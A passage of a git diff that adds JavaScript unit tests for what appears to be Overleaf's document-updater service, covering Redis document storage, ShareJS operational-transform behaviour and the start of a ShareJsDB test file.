this.callback.should.have.been.calledWith( + sinon.match({ + info: { + firstVersionInRedis: this.first_version_in_redis, + version: this.version, + ttlInS: this.RedisManager.DOC_OPS_TTL, + }, + }) + ) + }) + + it('should log out the problem as a debug message', function () { + this.logger.debug.called.should.equal(true) + }) + }) + + describe('with a slow request to redis', function () { + beforeEach(function () { + this.first_version_in_redis = 30 + this.version = 70 + this.length = this.version - this.first_version_in_redis + this.start = 50 + this.end = 60 + this.ops = [{ mock: 'op-1' }, { mock: 'op-2' }] + this.jsonOps = this.ops.map(op => JSON.stringify(op)) + this.rclient.llen = sinon.stub().callsArgWith(1, null, this.length) + this.rclient.get = sinon + .stub() + .callsArgWith(1, null, this.version.toString()) + this.clock = sinon.useFakeTimers() + this.rclient.lrange = (key, start, end, cb) => { + this.clock.tick(6000) + cb(null, this.jsonOps) + } + this.RedisManager.getPreviousDocOps( + this.docId, + this.start, + this.end, + this.callback + ) + }) + + afterEach(function () { + this.clock.restore() + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + }) + + describe('updateDocument', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three', 'これは'] + this.ops = [{ op: [{ i: 'foo', p: 4 }] }, { op: [{ i: 'bar', p: 8 }] }] + this.version = 42 + this.hash = crypto + .createHash('sha1') + .update(JSON.stringify(this.lines), 'utf8') + .digest('hex') + this.ranges = { comments: 'mock', entries: 'mock' } + this.updateMeta = { user_id: 'last-author-fake-id' } + this.doc_update_list_length = sinon.stub() + this.project_update_list_length = sinon.stub() + + this.RedisManager.getDocVersion = sinon.stub() + this.multi.mset = sinon.stub() + this.multi.set = sinon.stub() + this.multi.rpush = sinon.stub() + this.multi.expire = sinon.stub() + this.multi.ltrim = sinon.stub() + this.multi.del = sinon.stub() + this.multi.exec = sinon + .stub() + .callsArgWith(0, null, [ + null, + null, + null, + null, + this.doc_update_list_length, + 
null, + null, + ]) + }) + + describe('with a consistent version', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + this.updateMeta, + this.callback + ) + }) + + it('should get the current doc version to check for consistency', function () { + this.RedisManager.getDocVersion + .calledWith(this.docId) + .should.equal(true) + }) + + it('should set most details in a single MSET call', function () { + this.multi.mset + .calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: JSON.stringify(this.ranges), + [`lastUpdatedAt:${this.docId}`]: Date.now(), + [`lastUpdatedBy:${this.docId}`]: 'last-author-fake-id', + }) + .should.equal(true) + }) + + it('should set the unflushed time', function () { + this.multi.set + .calledWith(`UnflushedTime:${this.docId}`, Date.now(), 'NX') + .should.equal(true) + }) + + it('should push the doc op into the doc ops list', function () { + this.multi.rpush + .calledWith( + `DocOps:${this.docId}`, + JSON.stringify(this.ops[0]), + JSON.stringify(this.ops[1]) + ) + .should.equal(true) + }) + + it('should renew the expiry ttl on the doc ops array', function () { + this.multi.expire + .calledWith(`DocOps:${this.docId}`, this.RedisManager.DOC_OPS_TTL) + .should.equal(true) + }) + + it('should truncate the list to 100 members', function () { + this.multi.ltrim + .calledWith( + `DocOps:${this.docId}`, + -this.RedisManager.DOC_OPS_MAX_LENGTH, + -1 + ) + .should.equal(true) + }) + + it('should call the callback', function () { + this.callback.should.have.been.called + }) + + it('should not log any errors', function () { + this.logger.error.calledWith().should.equal(false) + }) + + describe('with a doc using project history only', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + this.updateMeta, + this.callback + ) + }) + + it('should call the callback', function () { + this.callback.should.have.been.called + }) + }) + }) + + describe('with an inconsistent version', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length - 1) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + this.updateMeta, + this.callback + ) + }) + + it('should not call multi.exec', function () { + this.multi.exec.called.should.equal(false) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('with no updates', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + [], + this.ranges, + this.updateMeta, + this.callback + ) + }) + + it('should set the unflushed time (potential ranges changes)', function () { + this.multi.set + .calledWith(`UnflushedTime:${this.docId}`, Date.now(), 'NX') 
+ .should.equal(true) + }) + + it('should not try to enqueue doc updates', function () { + this.multi.rpush.called.should.equal(false) + }) + + it('should still set the doclines', function () { + this.multi.mset + .calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: JSON.stringify(this.ranges), + [`lastUpdatedAt:${this.docId}`]: Date.now(), + [`lastUpdatedBy:${this.docId}`]: 'last-author-fake-id', + }) + .should.equal(true) + }) + }) + + describe('with empty ranges', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + {}, + this.updateMeta, + this.callback + ) + }) + + it('should set empty ranges', function () { + this.multi.mset + .calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: null, + [`lastUpdatedAt:${this.docId}`]: Date.now(), + [`lastUpdatedBy:${this.docId}`]: 'last-author-fake-id', + }) + .should.equal(true) + }) + }) + + describe('with null bytes in the serialized doc lines', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.stringifyStub = sinon + .stub(JSON, 'stringify') + .callsFake(() => '["bad bytes! \u0000 <- here"]') + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + this.updateMeta, + this.callback + ) + }) + + afterEach(function () { + this.stringifyStub.restore() + }) + + it('should log an error', function () { + this.logger.error.called.should.equal(true) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('with ranges that are too big', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.RedisManager._serializeRanges = sinon + .stub() + .yields(new Error('ranges are too large')) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + this.updateMeta, + this.callback + ) + }) + + it('should log an error', function () { + this.logger.error.called.should.equal(true) + }) + + it('should call the callback with the error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('without user id from meta', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + {}, + this.callback + ) + }) + + it('should unset last updater', function () { + this.multi.mset + .calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: JSON.stringify(this.ranges), + [`lastUpdatedAt:${this.docId}`]: Date.now(), + [`lastUpdatedBy:${this.docId}`]: undefined, + 
}) + .should.equal(true) + }) + }) + }) + + describe('putDocInMemory', function () { + beforeEach(function () { + this.multi.mset = sinon.stub() + this.multi.sadd = sinon.stub() + this.multi.del = sinon.stub() + this.multi.exists = sinon.stub() + this.multi.exec.onCall(0).yields(null, [0]) + this.rclient.sadd = sinon.stub().yields() + this.lines = ['one', 'two', 'three', 'これは'] + this.version = 42 + this.hash = crypto + .createHash('sha1') + .update(JSON.stringify(this.lines), 'utf8') + .digest('hex') + this.ranges = { comments: 'mock', entries: 'mock' } + this.resolvedCommentIds = ['comment-1'] + this.pathname = '/a/b/c.tex' + }) + + describe('with non-empty ranges', function () { + beforeEach(function (done) { + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + done + ) + }) + + it('should set all the details in a single MSET call', function () { + this.multi.mset + .calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`ProjectId:${this.docId}`]: this.project_id, + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: JSON.stringify(this.ranges), + [`Pathname:${this.docId}`]: this.pathname, + [`ProjectHistoryId:${this.docId}`]: this.projectHistoryId, + }) + .should.equal(true) + }) + + it('should add the docId to the project set', function () { + this.multi.sadd + .calledWith(`DocsIn:${this.project_id}`, this.docId) + .should.equal(true) + }) + + it('should not log any errors', function () { + this.logger.error.calledWith().should.equal(false) + }) + + it('should remove the document from the HistoryRangesSupport set in Redis', function () { + this.rclient.srem.should.have.been.calledWith( + 'HistoryRangesSupport', + this.docId + ) + }) + + it('should not store the resolved comments in Redis', function () { + this.multi.sadd.should.not.have.been.calledWith( + `ResolvedCommentIds:${this.docId}` + ) + }) + }) + + describe('with empty ranges', function () { + beforeEach(function (done) { + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + {}, + [], + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + done + ) + }) + + it('should unset ranges', function () { + this.multi.mset.should.have.been.calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`ProjectId:${this.docId}`]: this.project_id, + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: null, + [`Pathname:${this.docId}`]: this.pathname, + [`ProjectHistoryId:${this.docId}`]: this.projectHistoryId, + }) + }) + }) + + describe('with null bytes in the serialized doc lines', function () { + beforeEach(function () { + this.stringifyStub = sinon + .stub(JSON, 'stringify') + .callsFake(() => '["bad bytes! 
\u0000 <- here"]') + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + this.callback + ) + }) + + afterEach(function () { + this.stringifyStub.restore() + }) + + it('should log an error', function () { + this.logger.error.called.should.equal(true) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('with ranges that are too big', function () { + beforeEach(function () { + this.RedisManager._serializeRanges = sinon + .stub() + .yields(new Error('ranges are too large')) + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + this.callback + ) + }) + + it('should log an error', function () { + this.logger.error.called.should.equal(true) + }) + + it('should call the callback with the error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('with history ranges support', function () { + beforeEach(function (done) { + this.historyRangesSupport = true + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + done + ) + }) + + it('should add the document to the HistoryRangesSupport set in Redis', function () { + this.rclient.sadd.should.have.been.calledWith( + 'HistoryRangesSupport', + this.docId + ) + }) + + it('should store the resolved comments in Redis', function () { + this.multi.del.should.have.been.calledWith( + `ResolvedCommentIds:${this.docId}` + ) + this.multi.sadd.should.have.been.calledWith( + `ResolvedCommentIds:${this.docId}`, + ...this.resolvedCommentIds + ) + }) + }) + + describe('when the project is blocked', function () { + beforeEach(function (done) { + this.multi.exec.onCall(0).yields(null, [1]) + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + err => { + this.error = err + done() + } + ) + }) + + it('should throw an error', function () { + expect(this.error.message).to.equal('Project blocked from loading docs') + }) + + it('should not store the doc', function () { + expect(this.multi.mset).to.not.have.been.called + }) + }) + }) + + describe('removeDocFromMemory', function () { + beforeEach(function (done) { + this.multi.strlen = sinon.stub() + this.multi.del = sinon.stub() + this.multi.srem = sinon.stub() + this.multi.exec.yields() + this.RedisManager.removeDocFromMemory(this.project_id, this.docId, done) + }) + + it('should check the length of the current doclines', function () { + this.multi.strlen.calledWith(`doclines:${this.docId}`).should.equal(true) + }) + + it('should delete the details in a single call', function () { + this.multi.del + .calledWith( + `doclines:${this.docId}`, + `ProjectId:${this.docId}`, + `DocVersion:${this.docId}`, + `DocHash:${this.docId}`, + `Ranges:${this.docId}`, + `Pathname:${this.docId}`, + `ProjectHistoryId:${this.docId}`, + `UnflushedTime:${this.docId}`, + `lastUpdatedAt:${this.docId}`, + `lastUpdatedBy:${this.docId}`, + 
`ResolvedCommentIds:${this.docId}` + ) + .should.equal(true) + }) + + it('should remove the docId from the project set', function () { + this.multi.srem + .calledWith(`DocsIn:${this.project_id}`, this.docId) + .should.equal(true) + }) + + it('should remove the docId from the HistoryRangesSupport set', function () { + this.rclient.srem.should.have.been.calledWith( + 'HistoryRangesSupport', + this.docId + ) + }) + }) + + describe('clearProjectState', function () { + beforeEach(function (done) { + this.rclient.del = sinon.stub().callsArg(1) + this.RedisManager.clearProjectState(this.project_id, done) + }) + + it('should delete the project state', function () { + this.rclient.del + .calledWith(`ProjectState:${this.project_id}`) + .should.equal(true) + }) + }) + + describe('renameDoc', function () { + beforeEach(function () { + this.rclient.rpush = sinon.stub().yields() + this.rclient.set = sinon.stub().yields() + this.update = { + id: this.docId, + pathname: (this.pathname = 'pathname'), + newPathname: (this.newPathname = 'new-pathname'), + } + }) + + describe('the document is cached in redis', function () { + beforeEach(function () { + this.RedisManager.getDoc = sinon + .stub() + .callsArgWith(2, null, 'lines', 'version') + this.RedisManager.renameDoc( + this.project_id, + this.docId, + this.userId, + this.update, + this.projectHistoryId, + this.callback + ) + }) + + it('update the cached pathname', function () { + this.rclient.set + .calledWith(`Pathname:${this.docId}`, this.newPathname) + .should.equal(true) + }) + }) + + describe('the document is not cached in redis', function () { + beforeEach(function () { + this.RedisManager.getDoc = sinon + .stub() + .callsArgWith(2, null, null, null) + this.RedisManager.renameDoc( + this.project_id, + this.docId, + this.userId, + this.update, + this.projectHistoryId, + this.callback + ) + }) + + it('does not update the cached pathname', function () { + this.rclient.set.called.should.equal(false) + }) + }) + + describe('getDocVersion', function () { + beforeEach(function () { + this.version = 12345 + this.rclient.mget = sinon + .stub() + .withArgs(`DocVersion:${this.docId}`) + .callsArgWith(1, null, [`${this.version}`]) + this.RedisManager.getDocVersion(this.docId, this.callback) + }) + + it('should return the document version', function () { + this.callback.calledWithExactly(null, this.version).should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ShareJS/TextTransformTests.js b/services/document-updater/test/unit/js/ShareJS/TextTransformTests.js new file mode 100644 index 0000000..a4fe5d7 --- /dev/null +++ b/services/document-updater/test/unit/js/ShareJS/TextTransformTests.js @@ -0,0 +1,444 @@ +/* eslint-disable + mocha/no-identical-title, + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
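The insert/insert cases that open this suite all follow a single position-shift rule, illustrated standalone below (an illustration of the expected behaviour, not the actual text._tc source): a concurrent insert strictly before our position, or at the same position when we transform with side === 'right', pushes our op right by the inserted text's length; otherwise the position is untouched.

function transformInsertPosition(p, otherInsert, side) {
  // shift right past text inserted before us, or at our position when
  // the tie-break side is 'right'
  if (otherInsert.p < p || (otherInsert.p === p && side === 'right')) {
    return p + otherInsert.i.length
  }
  return p
}

// transformInsertPosition(9, { i: 'bar', p: 3 })          // => 12
// transformInsertPosition(3, { i: 'bar', p: 9 })          // => 3
// transformInsertPosition(3, { i: 'bar', p: 3 }, 'right') // => 6
// transformInsertPosition(3, { i: 'bar', p: 3 }, 'left')  // => 3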
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS202: Simplify dynamic range loops + * DS205: Consider reworking code to avoid use of IIFEs + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const text = require('../../../../app/js/sharejs/types/text') +const RangesTracker = require('@overleaf/ranges-tracker') + +describe('ShareJS text type', function () { + beforeEach(function () { + return (this.t = 'mock-thread-id') + }) + + describe('transform', function () { + describe('insert / insert', function () { + it('with an insert before', function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 9 }, { i: 'bar', p: 3 }) + return dest.should.deep.equal([{ i: 'foo', p: 12 }]) + }) + + it('with an insert after', function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 3 }, { i: 'bar', p: 9 }) + return dest.should.deep.equal([{ i: 'foo', p: 3 }]) + }) + + it("with an insert at the same place with side == 'right'", function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 3 }, { i: 'bar', p: 3 }, 'right') + return dest.should.deep.equal([{ i: 'foo', p: 6 }]) + }) + + return it("with an insert at the same place with side == 'left'", function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 3 }, { i: 'bar', p: 3 }, 'left') + return dest.should.deep.equal([{ i: 'foo', p: 3 }]) + }) + }) + + describe('insert / delete', function () { + it('with a delete before', function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 9 }, { d: 'bar', p: 3 }) + return dest.should.deep.equal([{ i: 'foo', p: 6 }]) + }) + + it('with a delete after', function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 3 }, { d: 'bar', p: 9 }) + return dest.should.deep.equal([{ i: 'foo', p: 3 }]) + }) + + it("with a delete at the same place with side == 'right'", function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 3 }, { d: 'bar', p: 3 }, 'right') + return dest.should.deep.equal([{ i: 'foo', p: 3 }]) + }) + + return it("with a delete at the same place with side == 'left'", function () { + const dest = [] + + text._tc(dest, { i: 'foo', p: 3 }, { d: 'bar', p: 3 }, 'left') + return dest.should.deep.equal([{ i: 'foo', p: 3 }]) + }) + }) + + describe('delete / insert', function () { + it('with an insert before', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 9 }, { i: 'bar', p: 3 }) + return dest.should.deep.equal([{ d: 'foo', p: 12 }]) + }) + + it('with an insert after', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 3 }, { i: 'bar', p: 9 }) + return dest.should.deep.equal([{ d: 'foo', p: 3 }]) + }) + + it("with an insert at the same place with side == 'right'", function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 3 }, { i: 'bar', p: 3 }, 'right') + return dest.should.deep.equal([{ d: 'foo', p: 6 }]) + }) + + it("with an insert at the same place with side == 'left'", function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 3 }, { i: 'bar', p: 3 }, 'left') + return dest.should.deep.equal([{ d: 'foo', p: 6 }]) + }) + + return it('with a delete that overlaps the insert location', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 3 }, { i: 'bar', p: 4 }) + return dest.should.deep.equal([ + { d: 'f', p: 3 }, + { d: 'oo', p: 6 }, + ]) + }) + }) + + describe('delete / delete', function () { + it('with a delete before', function () { + const dest = [] + text._tc(dest, { d: 
'foo', p: 9 }, { d: 'bar', p: 3 })
+        return dest.should.deep.equal([{ d: 'foo', p: 6 }])
+      })
+
+      it('with a delete after', function () {
+        const dest = []
+        text._tc(dest, { d: 'foo', p: 3 }, { d: 'bar', p: 9 })
+        return dest.should.deep.equal([{ d: 'foo', p: 3 }])
+      })
+
+      it('with deleting the same content', function () {
+        const dest = []
+        text._tc(dest, { d: 'foo', p: 3 }, { d: 'foo', p: 3 }, 'right')
+        return dest.should.deep.equal([])
+      })
+
+      it('with the delete overlapping before', function () {
+        const dest = []
+        text._tc(dest, { d: 'foobar', p: 3 }, { d: 'abcfoo', p: 0 }, 'right')
+        return dest.should.deep.equal([{ d: 'bar', p: 0 }])
+      })
+
+      it('with the delete overlapping after', function () {
+        const dest = []
+        text._tc(dest, { d: 'abcfoo', p: 3 }, { d: 'foobar', p: 6 })
+        return dest.should.deep.equal([{ d: 'abc', p: 3 }])
+      })
+
+      it('with the delete overlapping the whole delete', function () {
+        const dest = []
+        text._tc(dest, { d: 'abcfoo123', p: 3 }, { d: 'foo', p: 6 })
+        return dest.should.deep.equal([{ d: 'abc123', p: 3 }])
+      })
+
+      return it('with the delete inside the whole delete', function () {
+        const dest = []
+        text._tc(dest, { d: 'foo', p: 6 }, { d: 'abcfoo123', p: 3 })
+        return dest.should.deep.equal([])
+      })
+    })
+
+    describe('comment / insert', function () {
+      it('with an insert before', function () {
+        const dest = []
+        text._tc(dest, { c: 'foo', p: 9, t: this.t }, { i: 'bar', p: 3 })
+        return dest.should.deep.equal([{ c: 'foo', p: 12, t: this.t }])
+      })
+
+      it('with an insert after', function () {
+        const dest = []
+        text._tc(dest, { c: 'foo', p: 3, t: this.t }, { i: 'bar', p: 9 })
+        return dest.should.deep.equal([{ c: 'foo', p: 3, t: this.t }])
+      })
+
+      it('with an insert at the left edge', function () {
+        const dest = []
+        text._tc(dest, { c: 'foo', p: 3, t: this.t }, { i: 'bar', p: 3 })
+        // RangesTracker doesn't inject inserts into comments on edges, so neither should we
+        return dest.should.deep.equal([{ c: 'foo', p: 6, t: this.t }])
+      })
+
+      it('with an insert at the right edge', function () {
+        const dest = []
+        text._tc(dest, { c: 'foo', p: 3, t: this.t }, { i: 'bar', p: 6 })
+        // RangesTracker doesn't inject inserts into comments on edges, so neither should we
+        return dest.should.deep.equal([{ c: 'foo', p: 3, t: this.t }])
+      })
+
+      return it('with an insert in the middle', function () {
+        const dest = []
+        text._tc(dest, { c: 'foo', p: 3, t: this.t }, { i: 'bar', p: 5 })
+        return dest.should.deep.equal([{ c: 'fobaro', p: 3, t: this.t }])
+      })
+    })
+
+    describe('comment / delete', function () {
+      it('with a delete before', function () {
+        const dest = []
+        text._tc(dest, { c: 'foo', p: 9, t: this.t }, { d: 'bar', p: 3 })
+        return dest.should.deep.equal([{ c: 'foo', p: 6, t: this.t }])
+      })
+
+      it('with a delete after', function () {
+        const dest = []
+        text._tc(dest, { c: 'foo', p: 3, t: this.t }, { d: 'bar', p: 9 })
+        return dest.should.deep.equal([{ c: 'foo', p: 3, t: this.t }])
+      })
+
+      it('with a delete overlapping the comment content before', function () {
+        const dest = []
+        text._tc(dest, { c: 'foobar', p: 6, t: this.t }, { d: '123foo', p: 3 })
+        return dest.should.deep.equal([{ c: 'bar', p: 3, t: this.t }])
+      })
+
+      it('with a delete overlapping the comment content after', function () {
+        const dest = []
+        text._tc(dest, { c: 'foobar', p: 6, t: this.t }, { d: 'bar123', p: 9 })
+        return dest.should.deep.equal([{ c: 'foo', p: 6, t: this.t }])
+      })
+
+      it('with a delete overlapping the comment content in the middle', function () {
+        const dest = []
+        text._tc(dest, { c: 'foo123bar', p: 6, t: this.t }, { d: '123', p: 9 })
+        return dest.should.deep.equal([{ c: 'foobar', p: 6, t: this.t }])
+      })
+
+      return it('with a delete overlapping the whole comment', function () {
+        const dest = []
+        text._tc(dest, { c: 'foo', p: 6, t: this.t }, { d: '123foo456', p: 3 })
+        return dest.should.deep.equal([{ c: '', p: 3, t: this.t }])
+      })
+    })
+
+    describe('insert / comment', function () {
+      return it('should not do anything', function () {
+        const dest = []
+        text._tc(dest, { i: 'foo', p: 6 }, { c: 'bar', p: 3 })
+        return dest.should.deep.equal([{ i: 'foo', p: 6 }])
+      })
+    })
+
+    describe('delete / comment', function () {
+      return it('should not do anything', function () {
+        const dest = []
+        text._tc(dest, { d: 'foo', p: 6 }, { c: 'bar', p: 3 })
+        return dest.should.deep.equal([{ d: 'foo', p: 6 }])
+      })
+    })
+
+    return describe('comment / comment', function () {
+      return it('should not do anything', function () {
+        const dest = []
+        text._tc(dest, { c: 'foo', p: 6 }, { c: 'bar', p: 3 })
+        return dest.should.deep.equal([{ c: 'foo', p: 6 }])
+      })
+    })
+  })
+
+  describe('apply', function () {
+    it('should apply an insert', function () {
+      return text.apply('foo', [{ i: 'bar', p: 2 }]).should.equal('fobaro')
+    })
+
+    it('should apply a delete', function () {
+      return text
+        .apply('foo123bar', [{ d: '123', p: 3 }])
+        .should.equal('foobar')
+    })
+
+    it('should do nothing with a comment', function () {
+      return text
+        .apply('foo123bar', [{ c: '123', p: 3 }])
+        .should.equal('foo123bar')
+    })
+
+    it('should throw an error when deleted content does not match', function () {
+      return (() => text.apply('foo123bar', [{ d: '456', p: 3 }])).should.throw(
+        Error
+      )
+    })
+
+    return it('should throw an error when comment content does not match', function () {
+      return (() => text.apply('foo123bar', [{ c: '456', p: 3 }])).should.throw(
+        Error
+      )
+    })
+  })
+
+  return describe('applying ops and comments in different orders', function () {
+    return it('should not matter which op or comment is applied first', function () {
+      let length, p
+      let asc, end
+      let asc1, end1
+      let asc3, end3
+      const transform = function (op1, op2, side) {
+        const d = []
+        text._tc(d, op1, op2, side)
+        return d
+      }
+
+      const applySnapshot = (snapshot, op) => text.apply(snapshot, op)
+
+      const applyRanges = function (rangesTracker, ops) {
+        for (const op of Array.from(ops)) {
+          rangesTracker.applyOp(op, {})
+        }
+        return rangesTracker
+      }
+
+      const commentsEqual = function (comments1, comments2) {
+        if (comments1.length !== comments2.length) {
+          return false
+        }
+        comments1.sort((a, b) => {
+          if (a.offset - b.offset === 0) {
+            return a.length - b.length
+          } else {
+            return a.offset - b.offset
+          }
+        })
+        comments2.sort((a, b) => {
+          if (a.offset - b.offset === 0) {
+            return a.length - b.length
+          } else {
+            return a.offset - b.offset
+          }
+        })
+        for (let i = 0; i < comments1.length; i++) {
+          const comment1 = comments1[i]
+          const comment2 = comments2[i]
+          if (
+            comment1.offset !== comment2.offset ||
+            comment1.length !== comment2.length
+          ) {
+            return false
+          }
+        }
+        return true
+      }
+
+      const SNAPSHOT = '123'
+
+      const OPS = []
+      // Insert ops
+      for (
+        p = 0, end = SNAPSHOT.length, asc = end >= 0;
+        asc ? p <= end : p >= end;
+        asc ? p++ : p--
+      ) {
+        OPS.push({ i: 'a', p })
+        OPS.push({ i: 'bc', p })
+      }
+      for (
+        p = 0, end1 = SNAPSHOT.length - 1, asc1 = end1 >= 0;
+        asc1 ? p <= end1 : p >= end1;
+        asc1 ?
p++ : p-- + ) { + let asc2, end2 + for ( + length = 1, end2 = SNAPSHOT.length - p, asc2 = end2 >= 1; + asc2 ? length <= end2 : length >= end2; + asc2 ? length++ : length-- + ) { + OPS.push({ d: SNAPSHOT.slice(p, p + length), p }) + } + } + for ( + p = 0, end3 = SNAPSHOT.length - 1, asc3 = end3 >= 0; + asc3 ? p <= end3 : p >= end3; + asc3 ? p++ : p-- + ) { + let asc4, end4 + for ( + length = 1, end4 = SNAPSHOT.length - p, asc4 = end4 >= 1; + asc4 ? length <= end4 : length >= end4; + asc4 ? length++ : length-- + ) { + OPS.push({ c: SNAPSHOT.slice(p, p + length), p, t: this.t }) + } + } + + return (() => { + const result = [] + for (const op1 of Array.from(OPS)) { + result.push( + (() => { + const result1 = [] + for (const op2 of Array.from(OPS)) { + const op1T = transform(op1, op2, 'left') + const op2T = transform(op2, op1, 'right') + + const rt12 = new RangesTracker() + const snapshot12 = applySnapshot( + applySnapshot(SNAPSHOT, [op1]), + op2T + ) + applyRanges(rt12, [op1]) + applyRanges(rt12, op2T) + + const rt21 = new RangesTracker() + const snapshot21 = applySnapshot( + applySnapshot(SNAPSHOT, [op2]), + op1T + ) + applyRanges(rt21, [op2]) + applyRanges(rt21, op1T) + + if (snapshot12 !== snapshot21) { + console.error( + { + op1, + op2, + op1T, + op2T, + snapshot12, + snapshot21, + }, + 'Ops are not consistent' + ) + throw new Error('OT is inconsistent') + } + + if (!commentsEqual(rt12.comments, rt21.comments)) { + console.log(rt12.comments) + console.log(rt21.comments) + console.error( + { + op1, + op2, + op1T, + op2T, + rt12_comments: rt12.comments, + rt21_comments: rt21.comments, + }, + 'Comments are not consistent' + ) + throw new Error('OT is inconsistent') + } else { + result1.push(undefined) + } + } + return result1 + })() + ) + } + return result + })() + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ShareJsDB/ShareJsDBTests.js b/services/document-updater/test/unit/js/ShareJsDB/ShareJsDBTests.js new file mode 100644 index 0000000..f122a8a --- /dev/null +++ b/services/document-updater/test/unit/js/ShareJsDB/ShareJsDBTests.js @@ -0,0 +1,181 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
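+//
+// As exercised by the tests below, ShareJsDB adapts Redis-backed document
+// state to the ShareJS DB interface: getSnapshot serves the lines/version the
+// instance was constructed with (keyed by "project_id:doc_id"), getOps only
+// calls RedisManager.getPreviousDocOps for a non-empty range, and writeOp
+// buffers ops in db.appliedOps rather than persisting them immediately.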
